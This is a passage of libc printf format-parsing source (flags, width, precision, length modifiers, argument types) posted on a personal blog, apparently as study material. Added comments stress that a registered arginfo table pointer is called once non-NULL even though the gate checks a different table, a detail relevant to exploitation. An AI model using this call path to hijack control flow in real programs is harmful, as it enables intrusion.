if (n != -1)
{
spec->data_arg = n - 1;
*max_ref_arg = MAX (*max_ref_arg, n);
}
}
else
/* Oops; that was actually the width and/or 0 padding flag.
Step back and read it again. */
format = begin;
}
/* Check for spec modifiers: consume any run of flag characters.  */
do
{
switch (*format)
{
case L_(' '):
/* Output a space in place of a sign, when there is no sign. */
spec->info.space = 1;
continue;
case L_('+'):
/* Always output + or - for numbers. */
spec->info.showsign = 1;
continue;
case L_('-'):
/* Left-justify things. */
spec->info.left = 1;
continue;
case L_('#'):
/* Use the "alternate form":
Hex has 0x or 0X, FP always has a decimal point. */
spec->info.alt = 1;
continue;
case L_('0'):
/* Pad with 0s. */
spec->info.pad = '0';
continue;
case L_('\''):
/* Show grouping in numbers if the locale information
indicates any. */
spec->info.group = 1;
continue;
case L_('I'):
/* Use the internationalized form of the output. Currently
means to use the `outdigits' of the current locale. */
spec->info.i18n = 1;
continue;
default:
break;
}
break;
}
while (*++format);
/* '-' overrides '0'.  */
if (spec->info.left)
spec->info.pad = ' ';
/* Get the field width. */
spec->width_arg = -1;
spec->info.width = 0;
if (*format == L_('*'))
{
/* The field width is given in an argument.
A negative field width indicates left justification. */
const UCHAR_T *begin = ++format;
if (ISDIGIT (*format))
{
/* The width argument might be found in a positional parameter. */
n = read_int (&format);
if (n != 0 && *format == L_('$'))
{
if (n != -1)
{
spec->width_arg = n - 1;
*max_ref_arg = MAX (*max_ref_arg, n);
}
++format; /* Skip '$'. */
}
}
if (spec->width_arg < 0)
{
/* Not in a positional parameter. Consume one argument. */
spec->width_arg = posn++;
++nargs;
format = begin; /* Step back and reread. */
}
}
else if (ISDIGIT (*format))
{
int n = read_int (&format);
/* Constant width specification. */
if (n != -1)
spec->info.width = n;
}
/* Get the precision. */
spec->prec_arg = -1;
/* -1 means none given; 0 means explicit 0. */
spec->info.prec = -1;
if (*format == L_('.'))
{
++format;
if (*format == L_('*'))
{
/* The precision is given in an argument. */
const UCHAR_T *begin = ++format;
if (ISDIGIT (*format))
{
n = read_int (&format);
if (n != 0 && *format == L_('$'))
{
if (n != -1)
{
spec->prec_arg = n - 1;
*max_ref_arg = MAX (*max_ref_arg, n);
}
++format;
}
}
if (spec->prec_arg < 0)
{
/* Not in a positional parameter. */
spec->prec_arg = posn++;
++nargs;
format = begin;
}
}
else if (ISDIGIT (*format))
{
int n = read_int (&format);
if (n != -1)
spec->info.prec = n;
}
else
/* "%.?" is treated like "%.0?". */
spec->info.prec = 0;
}
/* Check for type modifiers. */
spec->info.is_long_double = 0;
spec->info.is_short = 0;
spec->info.is_long = 0;
spec->info.is_char = 0;
spec->info.user = 0;
/* A registered modifier handler (second table, __printf_modifier_table)
   gets first refusal; the built-in switch runs when there is none or
   the handler does not claim the character.  */
if (__builtin_expect (__printf_modifier_table == NULL, 1)
|| __printf_modifier_table[*format] == NULL
|| HANDLE_REGISTERED_MODIFIER (&format, &spec->info) != 0)
switch (*format++)
{
case L_('h'):
/* ints are short ints or chars. */
if (*format != L_('h'))
spec->info.is_short = 1;
else
{
++format;
spec->info.is_char = 1;
}
break;
case L_('l'):
/* ints are long ints. */
spec->info.is_long = 1;
if (*format != L_('l'))
break;
++format;
/* FALLTHROUGH */
case L_('L'):
/* doubles are long doubles, and ints are long long ints. */
case L_('q'):
/* 4.4 uses this for long long. */
spec->info.is_long_double = 1;
break;
case L_('z'):
case L_('Z'):
/* ints are size_ts. */
assert (sizeof (size_t) <= sizeof (unsigned long long int));
#if LONG_MAX != LONG_LONG_MAX
spec->info.is_long_double = (sizeof (size_t)
> sizeof (unsigned long int));
#endif
spec->info.is_long = sizeof (size_t) > sizeof (unsigned int);
break;
case L_('t'):
assert (sizeof (ptrdiff_t) <= sizeof (long long int));
#if LONG_MAX != LONG_LONG_MAX
spec->info.is_long_double = (sizeof (ptrdiff_t) > sizeof (long int));
#endif
spec->info.is_long = sizeof (ptrdiff_t) > sizeof (int);
break;
case L_('j'):
assert (sizeof (uintmax_t) <= sizeof (unsigned long long int));
#if LONG_MAX != LONG_LONG_MAX
spec->info.is_long_double = (sizeof (uintmax_t)
> sizeof (unsigned long int));
#endif
spec->info.is_long = sizeof (uintmax_t) > sizeof (unsigned int);
break;
default:
/* Not a recognized modifier. Backup. */
--format;
break;
}
/* Get the format specification. */
spec->info.spec = (wchar_t) *format++;
spec->size = -1;
/* Registered arginfo handler first.  Note that the gate tests
   __printf_function_table for NULL but then indexes
   __printf_arginfo_table: both tables must therefore be populated
   consistently, and the arginfo slot is called as soon as it is
   non-NULL and the specifier fits in a byte.  */
if (__builtin_expect (__printf_function_table == NULL, 1)
|| spec->info.spec > UCHAR_MAX
|| __printf_arginfo_table[spec->info.spec] == NULL
/* We don't try to get the types for all arguments if the format
uses more than one. The normal case is covered though. If
the call returns -1 we continue with the normal specifiers. */
|| (int) (spec->ndata_args = (*__printf_arginfo_table[spec->info.spec])
(&spec->info, 1, &spec->data_arg_type,
&spec->size)) < 0)
{
/* Find the data argument types of a built-in spec. */
spec->ndata_args = 1;
switch (spec->info.spec)
{
case L'i':
case L'd':
case L'u':
case L'o':
case L'X':
case L'x':
case L'B':
case L'b':
#if LONG_MAX != LONG_LONG_MAX
if (spec->info.is_long_double)
spec->data_arg_type = PA_INT|PA_FLAG_LONG_LONG;
else
#endif
if (spec->info.is_long)
spec->data_arg_type = PA_INT|PA_FLAG_LONG;
else if (spec->info.is_short)
spec->data_arg_type = PA_INT|PA_FLAG_SHORT;
else if (spec->info.is_char)
spec->data_arg_type = PA_CHAR;
else
spec->data_arg_type = PA_INT;
break;
case L'e':
case L'E':
case L'f':
case L'F':
case L'g':
case L'G':
case L'a':
case L'A':
if (spec->info.is_long_double)
spec->data_arg_type = PA_DOUBLE|PA_FLAG_LONG_DOUBLE;
else
spec->data_arg_type = PA_DOUBLE;
break;
case L'c':
spec->data_arg_type = PA_CHAR;
break;
case L'C':
spec->data_arg_type = PA_WCHAR;
break;
case L's':
spec->data_arg_type = PA_STRING;
break;
case L'S':
spec->data_arg_type = PA_WSTRING;
break;
case L'p':
spec->data_arg_type = PA_POINTER;
break;
case L'n':
spec->data_arg_type = PA_INT|PA_FLAG_PTR;
break;
case L'm':
default:
/* An unknown spec will consume no args. */
spec->ndata_args = 0;
break;
}
}
if (spec->data_arg == -1 && spec->ndata_args > 0)
{
/* There are args consumed, but no positional spec. Use the
next sequential arg position. */
spec->data_arg = posn;
nargs += spec->ndata_args;
}
/* Record where this specifier ends and where the next one starts so
   the caller can emit the literal text in between.  */
if (spec->info.spec == L'\0')
/* Format ended before this spec was complete. */
spec->end_of_fmt = spec->next_fmt = format - 1;
else
{
/* Find the next format spec. */
spec->end_of_fmt = format;
#ifdef COMPILE_WPRINTF
spec->next_fmt = __find_specwc (format);
#else
spec->next_fmt = __find_specmb (format);
#endif
}
return nargs;
}


文章作者: q1ming
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 q1ming !